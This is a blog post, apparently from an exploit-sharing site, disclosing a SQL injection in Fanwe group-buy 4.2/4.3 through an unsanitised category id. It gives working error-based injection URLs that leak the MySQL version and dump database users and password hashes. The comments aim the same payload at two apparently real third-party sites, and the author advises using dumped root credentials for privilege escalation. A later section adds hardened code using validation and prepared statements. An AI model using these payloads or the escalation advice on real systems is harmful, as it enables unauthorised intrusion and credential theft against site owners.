方维团购 (Fanwe Group-Buy) 4.3 latest version SQL injection, also works on 4.2

\\app\source\goods_list.php

[php]
// group-buy categories
$sidegoodscatelist = getGoodsCate(" and pid=0 ");
$catepid = 0;               // category ID
$pid = 0;                   // top-level category ID
$sub_cate_list = array();   // sub-categories
$is_top_cate = 0;           // whether this is a top-level category
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
    $catepid = $_REQUEST['id']; // takes the id parameter from the request
    foreach($sidegoodscatelist as $k => $v){
        if($v['id']==$catepid)
        {
            $is_top_cate=1;
        }
    }
    if($is_top_cate==0)
    {
        $sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid));
        // executes: select pid from " . DB_PREFIX . "goods_cate where id=" . $_REQUEST['id']
        // which is what causes the injection
        foreach($sub_cate_list as $kk => $vv)
        {
            if($vv['id']==$catepid)
            {
                $pid = $vv['pid'];
            }
        }
    }
    else
    {
        $sub_cate_list = getGoodsCate(" and pid=".$catepid);
        $pid = $_REQUEST['id'];
    }
}
$GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS['tpl']->assign('catepid',$catepid);
$GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list);
$GLOBALS['tpl']->assign('is_top_cate',$is_top_cate);
$GLOBALS['tpl']->assign('pid',$pid);
// end group-buy categories
[/php]

As you can see:

[php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php]

If m=goods, a=showcate and the id value passed is not empty, then

[php]$catepid = $_REQUEST['id'];[/php]

takes the id parameter straight from the request, and it is then concatenated into the SQL statement

[php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php]

which is what causes the injection.

exp:

1. Determine the MySQL version

[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

2. Get the MySQL account and password

[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]
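As an added example (not Fanwe's own code), here is a hardened replacement for the parent-category lookup above: the id is accepted only if it is a plain positive integer, and it is bound as a prepared-statement parameter instead of being concatenated, so the page's payloads can no longer reach the query. The DB_PREFIX value, the goods_cate columns and the sample rows in the in-memory SQLite table are assumptions made for the demo.

```php
<?php
// Added example, not Fanwe's code: hardened version of the goods_cate parent lookup.
// Assumes a PDO handle and the DB_PREFIX constant the original code relies on.
if (!defined('DB_PREFIX')) {
    define('DB_PREFIX', 'fanwe_'); // assumed prefix for the demo
}

// Returns the parent id of a category, or null when the input is not a plain
// positive integer or the category does not exist. The id is bound as a
// parameter, so it can never change the structure of the query.
function parentCateId(PDO $pdo, $rawId)
{
    if (!preg_match('/^[1-9][0-9]*$/', (string) $rawId)) {
        return null; // "103 and (select ...)" is rejected here, before any SQL runs
    }
    $stmt = $pdo->prepare('SELECT pid FROM ' . DB_PREFIX . 'goods_cate WHERE id = :id');
    $stmt->execute([':id' => (int) $rawId]);
    $pid = $stmt->fetchColumn();
    return $pid === false ? null : (int) $pid;
}

// Constructed sample data in an in-memory SQLite database (stands in for MySQL).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ' . DB_PREFIX . 'goods_cate (id INTEGER PRIMARY KEY, pid INTEGER)');
$pdo->exec('INSERT INTO ' . DB_PREFIX . 'goods_cate VALUES (1, 0), (103, 1)');

$inputs = [
    '103',    // legitimate sub-category: pid=1
    '1',      // top-level category: pid=0
    '999',    // well-formed but unknown id: not found
    '103 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)',
    '',       // empty id, which the original code also skips
];
foreach ($inputs as $in) {
    $pid = parentCateId($pdo, $in);
    printf("%-32.32s => %s\n", $in, $pid === null ? 'rejected / not found' : "pid=$pid");
}
```

Note that the original code concatenates `$catepid` into getGoodsCate() in the else branch as well, so the validation belongs at the single point where `$_REQUEST['id']` is read rather than only in front of the getOne() call.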

16 comments

  1. 爆笑笑话

    Thanks for taking the trouble to put together so much material, concise and comprehensive

    1. 0day5
      @爆笑笑话

      Thanks for your support~

  2. Ray

    Probably from some 37 site or other, right?

  3. 小菜鸟

    Boss, could you write an exp that grabs the account and password? I don't know how to modify yours

    1. 0day5
      @小菜鸟

      Using your brain a little helps you learn

  4. shy

    Can't you dump the admin panel password instead? There aren't that many root accounts out there

    1. 0day5
      @shy

      Sure you can, this is just an example

  5. adsf

    By the way, why is the MySQL password that got dumped 41 characters long?

    1. 0day5
      @adsf

      Look at the picture carefully, one of the digits is extra

    2. 0day5
      @adsf

      ..........

  6. 神速小白

    http://tg.np5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      This... is only provided for, you know, don't use it for illegal purposes

  7. 神速小白

    http://qianrengou.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      This... is only provided for, you know, don't use it for illegal purposes

      1. asdfg
        @0day5

        How do I use the root that got dumped?

        1. 0day5
          @asdfg

          If remote connections are allowed, or there is a phpMyAdmin, you can try privilege escalation
